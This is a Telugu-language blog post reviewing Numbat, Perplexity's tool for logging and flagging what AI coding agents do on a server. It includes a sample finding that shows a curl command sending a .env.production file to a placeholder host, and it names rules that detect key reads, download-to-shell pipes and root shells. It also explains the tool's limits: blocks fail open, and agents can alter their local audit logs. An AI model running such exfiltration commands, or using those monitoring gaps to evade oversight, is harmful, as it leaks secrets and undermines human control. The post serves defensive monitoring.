SSD Nodes Learn 🎉 VPS $4.99/నెల నుండి

AI ఏజెంట్లు మీ సర్వర్‌లో ఏం చేస్తున్నాయో తెలుసుకోవడం ఎలా?

Perplexity విడుదల చేసిన Numbat టూల్ గురించి తెలుసుకోండి. ఇది మీ సర్వర్‌లో AI కోడింగ్ ఏజెంట్లు చేసే పనులను, SSH కీ యాక్సెస్ వంటి అనుమానాస్పద చర్యలను ఎలా పర్యవేక్షిస్తుందో ఇక్కడ చూడండి.

Numbat అంటే ఏమిటి

మీరు కలిగి ఉన్న మెషీన్‌పై AI ఏజెంట్ ఏమి చేసిందో తెలుసుకోవడానికి Numbat మీకు సహాయపడుతుంది. కోడింగ్ ఏజెంట్లు ఇప్పటికే రూపొందించే హుక్ కాల్‌బ్యాక్‌లు (hook callbacks) మరియు సెషన్ ఫైళ్లను ఇది చదువుతుంది. వాటిని ఒకే ఈవెంట్ ఫార్మాట్‌లోకి మారుస్తుంది. SSH ప్రైవేట్ కీని చదవడం లేదా డౌన్‌లోడ్‌ను నేరుగా షెల్‌లోకి పైప్ చేయడం వంటి ప్రవర్తనలను గుర్తించే నియమాలతో ఇది సరిపోల్చుతుంది. Perplexity దీనిని Apache 2.0 లైసెన్స్ కింద ఓపెన్ సోర్స్‌గా విడుదల చేసింది. దీని మొదటి ట్యాగ్ చేయబడిన వెర్షన్ 29 July 2026న విడుదలైంది.

కింద ఉన్న సమాచారం అంతా ప్రాజెక్ట్ రిపోజిటరీ మరియు దాని డాక్యుమెంటేషన్ నుండి సేకరించబడింది, దీనిని 2 August 2026న చదవడం జరిగింది. Perplexity ఏదైనా క్లెయిమ్ చేసినప్పుడు, ఈ పోస్ట్ దానిని పేర్కొంటుంది. ఇది ఇన్‌స్టాలేషన్ ట్యుటోరియల్ కాదు, ఎందుకంటే ఈ రిపోజిటరీ కొన్ని రోజుల క్రితమే ప్రారంభమైంది మరియు దీని కమాండ్‌లు మారే అవకాశం ఉంది.

సమస్య: ఏజెంట్ ఏమి చేసిందో ఎవరూ నమోదు చేయరు

మీ VPSలో పనిచేసే కోడింగ్ ఏజెంట్, మీరు అనుమతించిన యూజర్ తరపున షెల్ కమాండ్లను రన్ చేస్తుంది, ఫైళ్లను చదువుతుంది, ఫైళ్లను రాస్తుంది మరియు నెట్‌వర్క్ కనెక్షన్‌లను తెరుస్తుంది. ఏజెంట్ మీ షెల్‌లో టైప్ చేయదు కాబట్టి, మీ షెల్ హిస్టరీలో వీటిలో ఏవీ నమోదు కావు. sshd మీ లాగిన్‌ను మాత్రమే లాగ్ చేస్తుంది, ఆ తర్వాత మోడల్ తీసుకున్న నిర్ణయాలను ఏవీ నమోదు చేయదు. sudoని ఏదైనా సంప్రదిస్తే తప్ప /var/log/auth.log మౌనంగా ఉంటుంది. ఏజెంట్ తన స్వంత ట్రాన్స్‌క్రిప్ట్‌ను ఉంచుకుంటుంది, కానీ ఆ ఫైల్ ఏజెంట్ సెషన్ డైరెక్టరీలో ఉంటుంది, దాని ఫార్మాట్ విడుదలల (releases) మధ్య మారుతూ ఉంటుంది మరియు ఏజెంట్ ప్రాసెస్ స్వయంగా దానిని మార్చగలదు.

కాబట్టి, గత మంగళవారం ఏజెంట్ .env.productionని చదివిందా అని ఎవరైనా అడిగితే, చాలా సర్వర్లలో నిజాయితీగా చెప్పాలంటే మీరు దానిని గుర్తించలేరు. ఆ లోపం వల్లే ఈ ప్రాజెక్ట్ ఉనికిలోకి వచ్చింది.

Numbat గురించి Perplexity ఏమి చెబుతోంది

README ఈ సాధనాన్ని "AI ఏజెంట్ కార్యకలాపాలపై ఎండ్‌పాయింట్ విజిబిలిటీ, లోకల్ డిటెక్షన్, ఐచ్ఛిక ప్రీ-యాక్షన్ బ్లాకింగ్ మరియు ఫోరెన్సిక్ రీకన్‌స్ట్రక్షన్" అని వివరిస్తూ ప్రారంభమవుతుంది. ఇక్కడ ఎండ్‌పాయింట్ అంటే ఏజెంట్ రన్ అయ్యే మెషీన్ అని అర్థం, బయట నుండి పర్యవేక్షించే నెట్‌వర్క్ అప్లయెన్స్ కాదు. ఇవి వేర్వేరు సామర్థ్యాలు మరియు వీటికి వేర్వేరు ప్రాముఖ్యత ఉంటుంది.

డిటెక్షన్ పరికరంలోనే రన్ అవుతుంది. రూల్స్ CEL (common expression language)లో రాయబడతాయి మరియు స్థానికంగా మూల్యాంకనం చేయబడతాయి. వీటిపై మల్టీ-స్టెప్ సీక్వెన్స్ రూల్స్ ఉంటాయి మరియు YAMLలో మీ స్వంత రూల్స్‌ను జోడించుకునే సదుపాయం ఉంది. ఒక రూల్ ట్రిగ్గర్ కావడానికి ఏ సమాచారం మెషీన్ నుండి బయటకు వెళ్లాల్సిన అవసరం లేదు.

బ్లాకింగ్ అనేది ఐచ్ఛికం మరియు పరిమితమైనది. ఇది కేవలం సింక్రోనస్ ప్రీ-యాక్షన్ హుక్స్ ద్వారా మాత్రమే పనిచేస్తుంది, అది కూడా ఆ హుక్స్‌ను అందించే ఏజెంట్లలో మాత్రమే. మీరు దీన్ని ఆన్ చేసే వరకు ఇది ఆఫ్ లోనే ఉంటుంది.

రీకన్‌స్ట్రక్షన్ అనేది జరిగిన తర్వాత జరుగుతుంది. numbat scan ఒక ఏజెంట్ ఇప్పటికే డిస్క్‌లో రాసిన సెషన్ ఆర్టిఫాక్ట్‌లను పార్స్ చేస్తుంది, కాబట్టి మీరు ఏదైనా ఇన్‌స్టాల్ చేయకముందు జరిగిన కార్యకలాపాలను కూడా చూడవచ్చు. ఈ ప్రాజెక్ట్ ఆ క్లెయిమ్‌ను జాగ్రత్తగా పరిమితం చేస్తుంది: "ఎట్-రెస్ట్ రీకన్‌స్ట్రక్షన్ అనేది డిస్క్ లేదా మెమరీ అక్విజిషన్ కాదు మరియు ఏజెంట్ సేవ్ చేయని కార్యకలాపాలను ఇది తిరిగి పొందలేదు."

అవుట్‌పుట్ అనేది వెర్షన్ చేయబడిన NDJSON (newline delimited JSON). ఇది ఈవెంట్‌లు, ఫైండింగ్స్, ఎన్‌ఫోర్స్‌మెంట్ నిర్ణయాలు, ఇండికేటర్లు మరియు స్కాన్ సమ్మరీలను కవర్ చేస్తుంది. v0.1.2 వెర్షన్ నాటికి ఇది స్కీమా వెర్షన్ 0.2.0లో ఉంది. రికార్డులు stdoutకి లేదా లోకల్ ఫైల్‌కు వెళ్తాయి, మరియు ఐచ్ఛికంగా మీరు రన్ చేసే కలెక్టర్‌కు HTTP ద్వారా పంపబడతాయి. ఇది cgo లేకుండా బిల్డ్ చేయబడిన ఒకే స్టాటిక్ Go బైనరీగా వస్తుంది. ఇది macOS, Linux మరియు Windows లలో amd64 మరియు arm64 ఆర్కిటెక్చర్ల కోసం అందుబాటులో ఉంది. కాబట్టి, Linux VPSలో ఇది ఎటువంటి రన్‌టైమ్ ఇన్‌స్టాల్ చేయాల్సిన అవసరం లేని ఒకే ఒక ఫైల్.

Numbat ఏ ఏజెంట్లను చూడగలదు?

docs/agent-coverage.md లోని కవరేజ్ మ్యాట్రిక్స్ అధికారిక జాబితా, ఇది అన్నింటికీ సమానంగా ఉండదు. ఈ ప్రాజెక్ట్ దీనిని దాచకుండా స్పష్టంగా తెలియజేస్తుంది. Claude Code, Codex, Gemini CLI, Cursor మరియు GitHub Copilot CLI లలో ఆర్టిఫాక్ట్ స్కానింగ్ మరియు ప్రీ-యాక్షన్ హుక్‌తో కూడిన లైవ్ క్యాప్చర్ రెండూ ఉన్నాయి. OpenClaw వెర్షన్ 2026.7.1 నుండి నేటివ్ ప్లగిన్‌ను పొందుతుంది. చాలా ఎంట్రీలు 'deferred' (వాయిదా వేయబడినవి) గా గుర్తించబడ్డాయి, అంటే లైవ్ హుక్ పాత్ అందుబాటులో ఉన్నప్పటికీ ఆర్టిఫాక్ట్ పార్సర్ లేదు. ఏజెంట్ రన్ అవుతున్నప్పుడు చదవడం సురక్షితం కాని రైట్-అహెడ్ లాగ్‌తో కూడిన SQLite లో ఆ ఏజెంట్ తన హిస్టరీని నిల్వ చేయడం దీనికి ప్రధాన కారణం. 2 ఆగస్టు 2026న మ్యాట్రిక్స్‌ను పరిశీలించినప్పుడు OpenCode మరియు Cline ఈ విభాగంలో ఉన్నాయి.

ఈ టూల్‌తో ఏదైనా ప్లాన్ చేసే ముందు మీ ఏజెంట్ కోసం ఉన్న అడ్డు వరుసను (row) తనిఖీ చేయండి, ఎందుకంటే "supported" (మద్దతు ఉన్న) అనే పదానికి ప్రతి వరుసలోనూ వేర్వేరు అర్థాలు ఉండవచ్చు.

డిటెక్షన్ ఎలా కనిపిస్తుంది

రూల్స్‌కు వాటి ఉద్దేశ్యాన్ని తెలిపే ఐడిలు ఉంటాయి. secrets.read_private_key అనేది SSH కీ, AWS క్రెడెన్షియల్స్, kube config లేదా ప్యాకేజీ రిజిస్ట్రీ లాగిన్‌ను కవర్ చేస్తుంది. curl లేదా wget అవుట్‌పుట్‌ను ఇంటర్‌ప్రెటర్‌లోకి పైప్ చేసినప్పుడు exec.download_pipe_shell ట్రిగ్గర్ అవుతుంది. sudo, doas, su లేదా pkexec ద్వారా ఇంటరాక్టివ్ root షెల్ కోసం వచ్చే అభ్యర్థనలను privilege.elevated_shell గుర్తిస్తుంది. తెలిసిన మైనర్ బైనరీలు మరియు ఇమేజ్ పేర్లతో impact.cryptomining_launch సరిపోలుతుంది.

సీక్వెన్స్ రూల్స్ ఒకే సెషన్‌లో జరిగే ఈవెంట్‌లను కలుపుతాయి. chain.secret_read_then_egressకి ఒక సీక్రెట్ ఫైల్‌ను చదవడం, ఆ తర్వాత డేటాను బయటకు పంపే కమాండ్‌ను అమలు చేయడం అవసరం. README ఫైల్, రెండు Claude Code ప్రీ-యాక్షన్ కాల్‌బ్యాక్‌ల నియంత్రిత రీప్లే నుండి సేకరించిన ఈ కింది ఫలితాన్ని ప్రచురిస్తుంది, ఇది లైవ్ ఇన్సిడెంట్ నుండి తీసుకున్నది కాదు. ఇక్కడ ముఖ్యమైన ఫీల్డ్‌లను మాత్రమే ఉంచి మిగిలినవి తొలగించబడ్డాయి:

{
  "record_type": "finding",
  "rule_id": "chain.secret_read_then_egress",
  "rule_version": "1.4",
  "severity": "high",
  "confidence": "medium",
  "title": "Secret-file access followed by data-bearing egress",
  "observed_command": "curl --data-binary @/workspace/acme-api/.env.production https://collector.example.invalid/ingest",
  "source_agent": "claude-code",
  "source_type": "hook",
  "tags": ["attack.t1048", "attack.t1552", "attack.t1567"]
}

రికార్డులో ఉన్న "confidence": "medium"ని గమనించండి, మరియు ఈ రకమైన అవుట్‌పుట్ మొత్తం గురించి ప్రాజెక్ట్ ఏమి చెబుతుందో గమనించండి: "ఫైండింగ్స్ అనేవి రూల్ మ్యాచ్‌లు మాత్రమే, అవి రాజీ (compromise) జరిగినట్లు రుజువు కాదు." ఒక కీని చదివి, ఆపై బిల్డ్ ఆర్టిఫాక్ట్‌ను అప్‌లోడ్ చేసే డిప్లాయ్ స్క్రిప్ట్ అదే సీక్వెన్స్ రూల్‌తో మ్యాచ్ అవుతుంది. మ్యాచ్ సరైనదే, కానీ అలారం తప్పు; మీరు ఇప్పటివరకు రన్ చేసిన ప్రతి డిటెక్షన్ టూల్‌లో ఇది సాధారణ స్థితి.

బ్లాకింగ్ డిఫాల్ట్‌గా ఆఫ్‌లో ఉంటుంది మరియు ఇది ఫెయిల్-ఓపెన్ పద్ధతిలో పనిచేస్తుంది

Numbat అందించే ప్రతి నియమం కేవలం మానిటర్ చేయడానికి మాత్రమే ఉంటుంది. ఒక నియమాన్ని బ్లాక్ చేసేలా మార్చడం అనేది ఉద్దేశపూర్వకమైన పని: ఆ నియమం యొక్క పూర్తి YAMLని మీ స్వంత డైరెక్టరీలోకి కాపీ చేయండి, అదే idని ఉంచండి, enforce: trueని జోడించండి, వెర్షన్‌ను పెంచండి, ఆపై ఆ పాలసీని ధృవీకరించి ఇన్‌స్టాల్ చేయండి.

numbat rules check --rules-dir ./numbat-policy
numbat hook install --agent codex --emit all \
  --rules-dir ./numbat-policy --enforce

ఇప్పుడు మీరు దీనిని ఎంతవరకు నమ్మవచ్చో నిర్ణయించే అంశం. Numbat యొక్క deny అనేది ఏజెంట్‌కు తిరిగి పంపబడే ఒక ప్రతిస్పందన, మరియు ఆ ఏజెంట్ మాత్రమే టూల్ కాల్‌ను తిరస్కరిస్తుంది. Numbat స్వయంగా ఏదైనా సమస్యను ఎదుర్కొన్నప్పుడు ఏమి జరుగుతుందో ఎన్‌ఫోర్స్‌మెంట్ గైడ్ స్పష్టంగా చెబుతోంది: "తప్పుగా ఉన్న పేలోడ్‌లు, సంబంధిత మూల్యాంకన లోపాలు, పానిక్స్ మరియు అవుట్‌పుట్ వైఫల్యాలు numbat denyని నిలిపివేస్తాయి." హుక్ ఇన్‌పుట్ 4 MiBకి పరిమితం చేయబడింది, మరియు పరిమితికి మించిన ఇన్‌పుట్ కూడా అదే మార్గాన్ని అనుసరిస్తుంది.

ఒక deny అమలులోకి వచ్చినప్పుడు దాని పరిమితి గురించి కూడా గైడ్ స్పష్టంగా ఉంది: "ఫెయిల్-ఓపెన్ అంటే numbat తన deny ప్రతిస్పందనను నిలిపివేస్తుంది. టూల్ ఖచ్చితంగా అమలు అవుతుందని ఇది హామీ ఇవ్వదు: హోస్ట్ ఇప్పటికీ ప్రాంప్ట్ చేయవచ్చు, తిరస్కరించవచ్చు, టైమ్ అవుట్ అవ్వవచ్చు లేదా మరొక హుక్ లేదా పాలసీని వర్తింపజేయవచ్చు."

కాబట్టి ఇక్కడ ఎన్‌ఫోర్స్‌మెంట్ అనేది ఒక గార్డ్‌రైల్ మాత్రమే, సరిహద్దు కాదు. ప్రాసెస్ క్రాష్ అయితే, Numbat ఆ చర్యను బ్లాక్ చేయదు, ఎందుకంటే ఏదైనా సమస్య వచ్చినప్పుడు మీ ఏజెంట్‌ను స్తంభింపజేసే మానిటర్‌ను ఎవరూ ఉంచుకోరు. ఈ రాజీ సమంజసమైనదే. కాబట్టి, deny ఎల్లప్పుడూ అందుతుందని భావించే భద్రతా నమూనాను నిర్మించవద్దు.

Numbat మీరు ఇప్పటికే చేస్తున్న పనులకు ఎలా సరిపోతుంది

Numbat ఎండ్‌పాయింట్‌లో, ఏజెంట్ యొక్క స్వంత ప్రాసెస్ ట్రీ లోపల రన్ అవుతుంది మరియు డిఫాల్ట్‌గా ~/.numbat/records.ndjson కి వ్రాస్తుంది. మీ యూజర్‌గా రన్ అవుతున్న ఏజెంట్ ఆ ఫైల్‌ను చదవగలదు. అది దానిని ఎడిట్ కూడా చేయగలదు. ఆడిట్ ట్రైల్ విలువ దాని చుట్టూ ఉన్న ఐసోలేషన్ (వేర్పాటు) మీద ఆధారపడి ఉంటుంది, కాబట్టి మీరు ఇప్పటికే కలిగి ఉన్న ప్రతి కంట్రోల్‌ను దీనికి ముందు ఉంచాలి, వెనుక కాదు.

కోడింగ్ ఏజెంట్‌కు డిస్పోజబుల్ VMని అందించడం అనేది ఒక తప్పుడు రన్ దేనిని చేరుకోగలదో దానిని పరిమితం చేస్తుంది. VPSలో లీస్ట్ ప్రివిలేజ్ యూజర్ ఏజెంట్‌ను అది తెరవకూడని ఫైళ్ల జోలికి వెళ్లకుండా ఉంచుతుంది. ఏజెంట్ కాంటెక్స్ట్ నుండి క్రెడెన్షియల్స్‌ను దూరంగా ఉంచడం వల్ల secrets.read_private_key మ్యాచ్ అరుదుగా జరుగుతుంది, కాబట్టి అది జరిగినప్పుడు పరిశీలించడం విలువైనదిగా ఉంటుంది. మరియు VPSలో Claude Code కోసం మీరు సెటప్ చేసిన శాండ్‌బాక్స్ ఇప్పటికీ కంటైన్‌మెంట్‌ను చేసే ప్రధాన అంశం.

Numbat జోడించేది రికార్డు మాత్రమే, కాబట్టి ఆ రికార్డును ఏజెంట్ చేరుకోలేని చోటికి పంపండి. numbat ship మరియు HTTP సింక్ ఆ పని కోసమే ఉన్నాయి. రెండవ మెషీన్‌లో స్ట్రీమ్ యొక్క కాపీ ఉండటం అనేది లాగ్ ఫైల్‌కు మరియు సాక్ష్యానికి మధ్య ఉన్న వ్యత్యాసం. ఈ ఈవెంట్ మోడల్ MCP (మోడల్ కాంటెక్స్ట్ ప్రోటోకాల్) ఫీల్డ్‌లను కూడా కలిగి ఉంటుంది, కాబట్టి మీరు VPSలో హోస్ట్ చేసే MCP సర్వర్ ద్వారా వెళ్లే టూల్ కాల్స్, లోకల్ షెల్ కమాండ్స్ ఉన్న అదే స్ట్రీమ్‌లోకి చేరుతాయి. ఇది చాలా ముఖ్యం, ఎందుకంటే bashని మాత్రమే గమనించే దేనికైనా ఆ మార్గం కనిపించదు.

మొదట రీడ్-ఓన్లీ (read-only) పద్ధతిలో ప్రయత్నించండి

పిన్ చేసిన వెర్షన్‌ను ఇన్‌స్టాల్ చేయండి. go install కోసం Go 1.26.5 లేదా అంతకంటే కొత్త వెర్షన్ అవసరం. మీరు సోర్స్ నుండి బిల్డ్ చేయకూడదనుకుంటే, రిలీజెస్ పేజీలో SHA-256 చెక్‌సమ్‌లతో కూడిన ప్రీ-బిల్ట్ బైనరీలు అందుబాటులో ఉంటాయి.

go install github.com/perplexityai/numbat/cmd/numbat@v0.1.2
numbat agents
numbat scan

numbat agents బాక్స్‌లో ఇన్‌స్టాల్ చేయబడిన ఏజెంట్లను గుర్తిస్తుంది. numbat scan డిస్క్‌లో ఇప్పటికే ఉన్న సెషన్ ఆర్టిఫాక్ట్‌లను పార్స్ చేసి రికార్డులను ప్రింట్ చేస్తుంది. ఈ కమాండ్‌లు "హుక్స్‌ను ఇన్‌స్టాల్ చేయవు లేదా ఏజెంట్ కాన్ఫిగరేషన్‌ను మార్చవు" అని README పేర్కొంది. అలాగే, numbat "ఆర్టిఫాక్ట్‌లలో కనిపించే ఏజెంట్లను లేదా కమాండ్‌లను ఎప్పుడూ ఎగ్జిక్యూట్ చేయదు, మరియు ఇది కాన్ఫిగర్ చేయబడిన HTTP సింక్‌లకు మాత్రమే అవుట్‌బౌండ్ అభ్యర్థనలను పంపుతుంది". స్కానింగ్ అనేది రీడ్-ఓన్లీ పద్ధతిలో జరుగుతుంది మరియు రహస్య సమాచారాన్ని తొలగిస్తుంది (redaction), సాధారణ రికార్డ్ అవుట్‌పుట్‌లో ఎప్పుడూ పూర్తి స్థాయి రా ట్రాన్స్‌క్రిప్ట్ ఉండదు.

లైవ్ క్యాప్చర్ అనేది తదుపరి దశ, ఇది ఏజెంట్ కాన్ఫిగరేషన్‌ను మారుస్తుంది:

numbat hook install --agent codex --emit all
numbat hook status --agent codex

--emit all ఈవెంట్‌లు, ఫైండింగ్‌లు, ఇండికేటర్లు మరియు వర్తించే ఎన్‌ఫోర్స్‌మెంట్ నిర్ణయాలను ~/.numbat/records.ndjson కి వ్రాస్తుంది. ప్రాజెక్ట్ నుండి నేరుగా రెండు హెచ్చరికలు ఉన్నాయి. హుక్స్ రన్ అవ్వడానికి ముందు ఏజెంట్ లోపల వాటిని విశ్వసించాల్సి రావచ్చు, మరియు --enforce వంటి ఫ్లాగ్‌లను మార్చిన తర్వాత ఆ నమ్మకాన్ని మళ్ళీ సమీక్షించాలి. మరియు hook status "ఎగ్జిక్యూషన్ లేదా డెలివరీని కాకుండా, కాన్ఫిగరేషన్‌ను మాత్రమే ధృవీకరిస్తుంది", కాబట్టి హెల్తీ స్టేటస్ లైన్ ఉందంటే రికార్డులు ఎక్కడికైనా చేరుతున్నాయని అర్థం కాదు.

ఈ కొత్త రిపోజిటరీ ఎందుకు డిపెండెన్సీ కాదు

పబ్లిక్ రిలీజ్‌లు 29 జూలై 2026న v0.1.1 మరియు 1 ఆగస్టు 2026న v0.1.2. ఈ పోస్ట్ 2 ఆగస్టు 2026న రాసినప్పుడు రిపోజిటరీకి 597 స్టార్స్ ఉన్నాయి. ఇంత వేగంగా పెరిగే సంఖ్యలు కోడ్ నాణ్యతను కాకుండా, Perplexity యొక్క ఆడియన్స్‌ను ప్రతిబింబిస్తాయి. ఒక స్టార్ అంటే ఎవరో ఆ పేజీని తర్వాత చూడటానికి సేవ్ చేసుకున్నారని అర్థం.

ఈ వెర్షన్ నంబర్, ఇది ఏ దశలో ఉందో స్పష్టంగా తెలియజేస్తుంది. v0.1.2 నోట్స్ ప్రధానంగా క్రెడెన్షియల్ రిడక్షన్ ఫిక్స్‌లు, అలాగే కేస్ బండిల్ మరియు టెలిమెట్రీ నార్మలైజేషన్ పనులకు సంబంధించినవి. ఇతర ప్రోగ్రామ్‌ల ట్రాన్స్‌క్రిప్ట్‌లను సురక్షితంగా చదవడం దీని పని. అటువంటి టూల్‌లో రిడక్షన్ బగ్‌లు ఉండటం ప్రారంభ దశలో సహజం. ఇన్‌పుట్‌లు పన్నెండు వేర్వేరు ఏజెంట్ల నుండి వస్తాయి మరియు ప్రతి ఏజెంట్ తమ ఫార్మాట్‌ను సొంత షెడ్యూల్‌లో మారుస్తుంది కాబట్టి, మరిన్ని బగ్‌లు వచ్చే అవకాశం ఉంది.

దీని నుండి రెండు ఆచరణాత్మక నియమాలు అనుసరించాలి. మీరు ఉంచే దేనిలోనైనా @latest ని కాకుండా, ట్యాగ్‌ను పిన్ చేయండి. రికార్డ్ స్కీమా స్థిరపడే వరకు, దీనిని మీరు డిపెండ్ అయ్యే కంట్రోల్‌గా కాకుండా, మీరు మూల్యాంకనం చేస్తున్న ఒక పరికరంగా పరిగణించండి.

FAQ

Numbat ప్రమాదకరమైన AI ఏజెంట్ కమాండ్‌లను నిరోధిస్తుందా?

మీరు ఎంచుకుంటే మాత్రమే, మరియు అది కూడా ఉత్తమ ప్రయత్నం (best effort) ప్రాతిపదికన మాత్రమే. Numbat విడుదల చేసే ప్రతి నియమం కేవలం పర్యవేక్షణ (monitor) కోసం మాత్రమే ఉంటుంది. నిరోధించడానికి, మీరు ఆ నియమం యొక్క YAMLని మీ స్వంత డైరెక్టరీలోకి కాపీ చేసి, దాని idని అలాగే ఉంచి, enforce: trueని జోడించి, వెర్షన్‌ను పెంచి, --enforceతో హుక్‌ను ఇన్‌స్టాల్ చేయాలి. అప్పుడు కూడా, ఆ నిరాకరణ (deny) అనేది ఏజెంట్‌కు తిరిగి పంపబడే ఒక ప్రతిస్పందన మాత్రమే, మరియు ఆ కాల్‌ను తిరస్కరించేది ఏజెంట్ మాత్రమే. ఈ ప్రాజెక్ట్ డాక్యుమెంటేషన్ 'fail-open' ప్రవర్తనను వివరిస్తుంది: తప్పుగా ఉన్న పేలోడ్‌లు, మూల్యాంకన లోపాలు, పానిక్స్ మరియు అవుట్‌పుట్ వైఫల్యాలు అన్నీ నిరాకరణను నిలిపివేస్తాయి. దీన్ని ఒక రక్షణ కవచంగా (guardrail) ఉపయోగించండి, మీ ఏకైక భద్రతా సరిహద్దుగా కాదు.

Numbat ఏ AI ఏజెంట్‌లకు మద్దతు ఇస్తుంది?

ఏజెంట్‌ను బట్టి కవరేజ్ మారుతూ ఉంటుంది మరియు అది రిపోజిటరీలోని docs/agent-coverage.mdలో జాబితా చేయబడింది. 2 ఆగస్టు 2026న ఆ పేజీని చదివినప్పుడు, Claude Code, Codex, Gemini CLI, Cursor మరియు GitHub Copilot CLI రెండింటికీ ఆర్టిఫాక్ట్ స్కానింగ్ మరియు లైవ్ క్యాప్చర్ సౌకర్యం ఉంది, మరియు OpenClaw వెర్షన్ 2026.7.1 నుండి నేటివ్ ప్లగిన్‌ను కలిగి ఉంది. అనేక ఇతర ఏజెంట్‌లు లైవ్ హుక్ పాత్‌తో జాబితా చేయబడ్డాయి, కానీ వాటికి ఇంకా ఆర్టిఫాక్ట్ పార్సర్ లేదు. సాధారణంగా వాటి సెషన్ హిస్టరీ ఒక SQLite డేటాబేస్‌లో ఉండటం వల్ల, ఏజెంట్ రన్ అవుతున్నప్పుడు దాన్ని చదవడం సురక్షితం కాదు. మీ ఏజెంట్ కోసం ఉన్న అడ్డు వరుసను (row) చదవండి, ఎందుకంటే "supported" అనే పదం అక్కడ వివిధ స్థాయిల మద్దతును సూచిస్తుంది.

ఏజెంట్ Numbat రికార్డులను మార్చగలదా?

అవును, అది అదే యూజర్ ఖాతాతో రన్ అయితే మార్చగలదు. రికార్డులు డిఫాల్ట్‌గా ఏజెంట్ ఉన్న అదే మెషీన్‌లో ~/.numbat/records.ndjson వద్ద ఉంటాయి, కాబట్టి ఆ పాత్‌కు రైట్ యాక్సెస్ ఉన్న ఏదైనా ఏజెంట్ వాటిని మార్చగలదు లేదా తొలగించగలదు. numbat ship లేదా HTTP సింక్ ఉపయోగించి ఆ స్ట్రీమ్‌ను ఏజెంట్ చేరుకోలేని కలెక్టర్‌కు పంపండి, మరియు స్థానిక ఫైల్‌ను కేవలం సౌకర్యం కోసం ఒక కాపీగా ఉంచుకోండి. అందుకే ఈ సాధనం ఐసోలేషన్‌కు ప్రత్యామ్నాయం కాదు, దానికి అదనపు భద్రత మాత్రమే. తక్కువ ప్రివిలేజ్ ఉన్న యూజర్ కింద ఒక డిస్పోజబుల్ VMలో పరిమితం చేయబడిన ఏజెంట్‌కు, తన స్వంత ఆడిట్ ట్రైల్‌పై చాలా తక్కువ నియంత్రణ ఉంటుంది.

Numbat ప్రొడక్షన్ సర్వర్‌కు సిద్ధంగా ఉందా?

మీరు ఆధారపడే ఒక నియంత్రణ సాధనంగా ఇది ఇంకా సిద్ధంగా లేదు. దీని మొదటి పబ్లిక్ రిలీజ్ v0.1.1, 29 జూలై 2026న జరిగింది మరియు v0.1.2, 1 ఆగస్టు 2026న విడుదలైంది, కాబట్టి ఫ్లాగ్‌లు మరియు రికార్డ్ స్కీమా రెండూ ఇంకా మారుతూనే ఉన్నాయి. ఒక బాక్స్‌పై numbat agents మరియు numbat scan రన్ చేయడం అనేది కేవలం రీడ్-ఓన్లీ మరియు తక్కువ ప్రమాదకరమైనది, ఇది మీ ఏజెంట్‌లు డిస్క్‌పై ఏమి వదిలిపెడుతున్నాయో మీకు తెలియజేస్తుంది. ముఖ్యమైన సర్వర్‌పై ఎన్‌ఫోర్స్‌మెంట్ హుక్స్‌ను ఇన్‌స్టాల్ చేయడం అనేది వేరే నిర్ణయం, దీనికి పిన్ చేసిన ట్యాగ్ మరియు హుక్ సరిగ్గా పనిచేయనప్పుడు తీసుకోవాల్సిన చర్యలపై ఒక ప్రణాళిక అవసరం.